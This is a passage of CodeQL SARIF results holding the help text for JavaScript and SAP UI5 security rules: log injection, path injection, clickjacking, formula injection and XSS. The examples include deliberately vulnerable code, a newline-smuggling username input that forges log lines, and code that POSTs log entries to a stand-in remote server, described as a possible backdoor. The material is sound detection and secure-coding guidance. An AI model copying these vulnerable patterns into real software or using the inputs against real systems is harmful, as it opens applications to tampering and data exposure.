\\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n    let q = url.parse(req.url, true);\n\n    console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n    let q = url.parse(req.url, true);\n\n    // GOOD: remove newlines from user controlled input before logging\n    let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n    console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n","markdown":"# Log injection\nIf unsanitized user input is written to a log entry, a malicious user may be able to forge new log entries.\n\nForgery can occur if a user provides some input with characters that are interpreted when the log output is displayed. If the log is displayed as a plain text file, then new line characters can be used by a malicious user. If the log is displayed as HTML, then arbitrary HTML may be included to spoof log entries.\n\n\n## Recommendation\nUser input should be suitably sanitized before it is logged.\n\nIf the log entries are in plain text then line breaks should be removed from user input, using `String.prototype.replace` or similar. Care should also be taken that user input is clearly marked in log entries.\n\nFor log entries that will be displayed in HTML, user input should be HTML-encoded before being logged, to prevent forgery and other forms of HTML injection.\n\n\n## Example\nIn the first example, a username, provided by the user, is logged using \\`console.info\\`. In the first case, it is logged without any sanitization. In the second case, the username is used to build an error that is logged using \\`console.error\\`. If a malicious user provides \\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n    let q = url.parse(req.url, true);\n\n    console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n    let q = url.parse(req.url, true);\n\n    // GOOD: remove newlines from user controlled input before logging\n    let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n    console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n"},"properties":{"tags":["security","external/cwe/cwe-117"],"description":"Building log entries from user-controlled sources is vulnerable to\n              insertion of forged log entries by a malicious user.","id":"js/log-injection","kind":"path-problem","name":"Log injection","precision":"medium","problem.severity":"error","security-severity":"6.1"}},{"id":"js/summary/lines-of-user-code","name":"js/summary/lines-of-user-code","shortDescription":{"text":"Total lines of user written JavaScript and TypeScript code in the database"},"fullDescription":{"text":"The total number of lines of JavaScript and TypeScript code from the source code directory, excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding whitespace or comments."},"defaultConfiguration":{"enabled":true},"properties":{"tags":["summary","lines-of-code","debug"],"description":"The total number of lines of JavaScript and TypeScript code from the source code directory,\n   excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding\n   whitespace or comments.","id":"js/summary/lines-of-user-code","kind":"metric","name":"Total lines of user written JavaScript and TypeScript code in the database"}},{"id":"js/summary/lines-of-code","name":"js/summary/lines-of-code","shortDescription":{"text":"Total lines of JavaScript and TypeScript code in the database"},"fullDescription":{"text":"The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments."},"defaultConfiguration":{"enabled":true},"properties":{"tags":["summary","telemetry"],"description":"The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments.","id":"js/summary/lines-of-code","kind":"metric","name":"Total lines of JavaScript and TypeScript code in the database"}}],"locations":[{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-queries/2.2.3/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-queries/2.2.3/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"codeql/javascript-all","semanticVersion":"2.6.18+28b6aa8616a393ebb45186e3ba4df004a0f3ef4e","locations":[{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-queries/2.2.3/.codeql/libraries/codeql/javascript-all/2.6.18/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-queries/2.2.3/.codeql/libraries/codeql/javascript-all/2.6.18/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"codeql/threat-models","semanticVersion":"1.0.38+28b6aa8616a393ebb45186e3ba4df004a0f3ef4e","locations":[{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-queries/2.2.3/.codeql/libraries/codeql/threat-models/1.0.38/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-queries/2.2.3/.codeql/libraries/codeql/threat-models/1.0.38/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"advanced-security/javascript-sap-ui5-queries","semanticVersion":"2.3.0+beda8c5e77ff63cd984068207702212afd00b7f4","rules":[{"id":"js/ui5-path-injection","name":"js/ui5-path-injection","shortDescription":{"text":"UI5 Path Injection"},"fullDescription":{"text":"Constructing path from an uncontrolled remote source to be passed to a filesystem API allows for manipulation of the local filesystem."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n    \"sap/ui/dom/includeScript\"\n  ],\n  function(includeScript) {\n    includeScript(\"http://some.vulnerable.domain/some-script.js\");\n  }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n   \"sap/ui/core/mvc/Controller\",\n   \"sap/ui/core/util/File\"\n  ],\n  function(Controller, File) {\n    return Controller.extend(\"vulnerable.controller.app\", {\n      onInit: function() {\n        let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n        this.getView().setModel(oDataV2Model);\n      },\n      \n      onSomeEvent: function() {\n        let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n        File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n      }\n    });\n  });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n","markdown":"# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n    \"sap/ui/dom/includeScript\"\n  ],\n  function(includeScript) {\n    includeScript(\"http://some.vulnerable.domain/some-script.js\");\n  }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n   \"sap/ui/core/mvc/Controller\",\n   \"sap/ui/core/util/File\"\n  ],\n  function(Controller, File) {\n    return Controller.extend(\"vulnerable.controller.app\", {\n      onInit: function() {\n        let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n        this.getView().setModel(oDataV2Model);\n      },\n      \n      onSomeEvent: function() {\n        let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n        File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n      }\n    });\n  });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n"},"properties":{"tags":["security","external/cwe/cwe-022","external/cwe/cwe-035"],"description":"Constructing path from an uncontrolled remote source to be passed\n              to a filesystem API allows for manipulation of the local filesystem.","id":"js/ui5-path-injection","kind":"path-problem","name":"UI5 Path Injection","precision":"medium","problem.severity":"error","security-severity":"7.8"}},{"id":"js/ui5-clickjacking","name":"js/ui5-clickjacking","shortDescription":{"text":"UI5 Clickjacking"},"fullDescription":{"text":"The absence of frame options allows for clickjacking."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n  frameOptions: \"deny\",\n  ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n<script src=\"resources/sap-ui-core.js\" data-sap-ui-frameOptions=\"deny\"></script>\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n<!doctype html>\n<html lang=\"en\">\n  <head>\n    ...\n    <script>\n      window[\"sap-ui-config\"] = {\n        frameOptions: \"allow\",  // either through JS\n        ...\n      };\n    </script>\n\n    <script\n      src=\"resources/sap-ui-core.js\"\n      data-sap-ui-frameOptions=\"allow\"  // or through this HTML attribute\n    ></script>\n  </head>\n  ...\n</html>\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n","markdown":"# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n  frameOptions: \"deny\",\n  ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n<script src=\"resources/sap-ui-core.js\" data-sap-ui-frameOptions=\"deny\"></script>\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n<!doctype html>\n<html lang=\"en\">\n  <head>\n    ...\n    <script>\n      window[\"sap-ui-config\"] = {\n        frameOptions: \"allow\",  // either through JS\n        ...\n      };\n    </script>\n\n    <script\n      src=\"resources/sap-ui-core.js\"\n      data-sap-ui-frameOptions=\"allow\"  // or through this HTML attribute\n    ></script>\n  </head>\n  ...\n</html>\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n"},"properties":{"tags":["security","external/cwe/cwe-451"],"description":"The absence of frame options allows for clickjacking.","id":"js/ui5-clickjacking","kind":"problem","name":"UI5 Clickjacking","precision":"medium","problem.severity":"error","security-severity":"6.1"}},{"id":"js/ui5-log-injection-to-http","name":"js/ui5-log-injection-to-http","shortDescription":{"text":"UI5 Log injection in outbound network request"},"fullDescription":{"text":"Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# UI5 Log injection in outbound network request\n\nSending user-controlled log data to a remote URL without further validation may lead to uncontrolled information exposure and to injection vulnerabilities. It may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\nUI5 applications can retrieve logs for further processing using `sap/base/Log.getLogEntries`, define custom listeners using `sap/base/Log.addLogListener` or directly display logs using the `sap/ui/vk/Notifications` control.\n\nThis query identifies instances where log entries from user input are forwarded to a remote URL. \n\n## Recommendation\n\nAvoid processing log entries that originate from user-controlled sources. Ensure that any log data is properly sanitized.\n\n## Example\n\nThe following example demonstrates a vulnerable code snippet:\n\n1. The UI5 application logs what the user submitted via the `sap.m.Input` control.\n```xml\n<Input placeholder=\"Enter Payload\" \n    value=\"{/input}\" />  <!--User input source sap.m.Input.value -->\n```\n```javascript\nvar input = oModel.getProperty(\"/input\");\njQuery.sap.log.debug(input);  // user input is logged as is\n```\n2. A second component sends log entries to a remote URL without further validation.\n```javascript\nconst http = new XMLHttpRequest();\nconst url = \"https://some.remote.server/location\";\nhttp.open(\"POST\", url);\nhttp.send(Log.getLogEntries()[0].message); // log entry is forwarded to a remote URL\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n","markdown":"# UI5 Log injection in outbound network request\n\nSending user-controlled log data to a remote URL without further validation may lead to uncontrolled information exposure and to injection vulnerabilities. It may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\nUI5 applications can retrieve logs for further processing using `sap/base/Log.getLogEntries`, define custom listeners using `sap/base/Log.addLogListener` or directly display logs using the `sap/ui/vk/Notifications` control.\n\nThis query identifies instances where log entries from user input are forwarded to a remote URL. \n\n## Recommendation\n\nAvoid processing log entries that originate from user-controlled sources. Ensure that any log data is properly sanitized.\n\n## Example\n\nThe following example demonstrates a vulnerable code snippet:\n\n1. The UI5 application logs what the user submitted via the `sap.m.Input` control.\n```xml\n<Input placeholder=\"Enter Payload\" \n    value=\"{/input}\" />  <!--User input source sap.m.Input.value -->\n```\n```javascript\nvar input = oModel.getProperty(\"/input\");\njQuery.sap.log.debug(input);  // user input is logged as is\n```\n2. A second component sends log entries to a remote URL without further validation.\n```javascript\nconst http = new XMLHttpRequest();\nconst url = \"https://some.remote.server/location\";\nhttp.open(\"POST\", url);\nhttp.send(Log.getLogEntries()[0].message); // log entry is forwarded to a remote URL\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n"},"properties":{"tags":["security","external/cwe/cwe-117"],"description":"Building log entries from user-controlled sources is vulnerable to\n              insertion of forged log entries by a malicious user.","id":"js/ui5-log-injection-to-http","kind":"path-problem","name":"UI5 Log injection in outbound network request","precision":"medium","problem.severity":"warning","security-severity":"6.5"}},{"id":"js/ui5-unsafe-log-access","name":"js/ui5-unsafe-log-access","shortDescription":{"text":"Access to user-controlled UI5 Logs"},"fullDescription":{"text":"Log entries from user-controlled sources should not be further processed."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Access to user-controlled UI5 Logs\n\nProcessing user-controlled log entries can lead to injection vulnerabilities, where an attacker can manipulate user input to affect the application excution.\n\nUI5 applications can retrieve logs for further processing using `sap/base/Log.getLogEntries`, define custom listeners using `sap/base/Log.addLogListener` or directly display logs using the `sap/ui/vk/Notifications` control.\n\nThis query identifies instances where user-controlled log entries are accessed in a UI5 application. \n\n## Recommendation\n\nAvoid accessing log entries that originate from user-controlled sources. Ensure that any log data is properly sanitized.\n\n## Example\n\nThe following example demonstrates a vulnerable code snippet:\n\n1. The UI5 application logs what the user submitted via the `sap.m.Input` control.\n```xml\n<Input placeholder=\"Enter Payload\" \n    value=\"{/input}\" />  <!--User input source sap.m.Input.value -->\n```\n```javascript\nvar input = oModel.getProperty(\"/input\");\njQuery.sap.log.debug(input);  // user input is logged as is\n```\n2. A second component retrieves log entries to further process them.\n```javascript\nlet message = Log.getLogEntries()[0].message; //access to user controlled logs\ndo_smth(message);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n","markdown":"# Access to user-controlled UI5 Logs\n\nProcessing user-controlled log entries can lead to injection vulnerabilities, where an attacker can manipulate user input to affect the application excution.\n\nUI5 applications can retrieve logs for further processing using `sap/base/Log.getLogEntries`, define custom listeners using `sap/base/Log.addLogListener` or directly display logs using the `sap/ui/vk/Notifications` control.\n\nThis query identifies instances where user-controlled log entries are accessed in a UI5 application. \n\n## Recommendation\n\nAvoid accessing log entries that originate from user-controlled sources. Ensure that any log data is properly sanitized.\n\n## Example\n\nThe following example demonstrates a vulnerable code snippet:\n\n1. The UI5 application logs what the user submitted via the `sap.m.Input` control.\n```xml\n<Input placeholder=\"Enter Payload\" \n    value=\"{/input}\" />  <!--User input source sap.m.Input.value -->\n```\n```javascript\nvar input = oModel.getProperty(\"/input\");\njQuery.sap.log.debug(input);  // user input is logged as is\n```\n2. A second component retrieves log entries to further process them.\n```javascript\nlet message = Log.getLogEntries()[0].message; //access to user controlled logs\ndo_smth(message);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n"},"properties":{"tags":["security","external/cwe/cwe-117"],"description":"Log entries from user-controlled sources should not be further processed.","id":"js/ui5-unsafe-log-access","kind":"path-problem","name":"Access to user-controlled UI5 Logs","precision":"medium","problem.severity":"warning","security-severity":"5"}},{"id":"js/ui5-formula-injection","name":"js/ui5-formula-injection","shortDescription":{"text":"UI5 Formula Injection"},"fullDescription":{"text":"Saving data from an uncontrolled remote source using filesystem or local storage leads to disclosure of sensitive information or forgery of entry."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n    \"sap/ui/core/Controller\",\n    \"sap/ui/core/util/File\"\n  ], function(Controller, File) {\n    return Controller.extend(\"vulnerable.controller.app\", {\n      onSomeEvent: function(oEvent) {\n         let response = oEvent.getProperty(\"someProperty\").someField;\n         let csvRow = \";\" + response + \";\";\n         File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n      }\n    });\n  });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n","markdown":"# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n    \"sap/ui/core/Controller\",\n    \"sap/ui/core/util/File\"\n  ], function(Controller, File) {\n    return Controller.extend(\"vulnerable.controller.app\", {\n      onSomeEvent: function(oEvent) {\n         let response = oEvent.getProperty(\"someProperty\").someField;\n         let csvRow = \";\" + response + \";\";\n         File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n      }\n    });\n  });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n"},"properties":{"tags":["security","external/cwe/cwe-1236"],"description":"Saving data from an uncontrolled remote source using filesystem or local storage\n              leads to disclosure of sensitive information or forgery of entry.","id":"js/ui5-formula-injection","kind":"path-problem","name":"UI5 Formula Injection","precision":"medium","problem.severity":"error","security-severity":"7.8"}},{"id":"js/ui5-xss","name":"js/ui5-xss","shortDescription":{"text":"UI5 Client-side cross-site scripting"},"fullDescription":{"text":"Writing user input directly to a UI5 View allows for a cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API  with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the 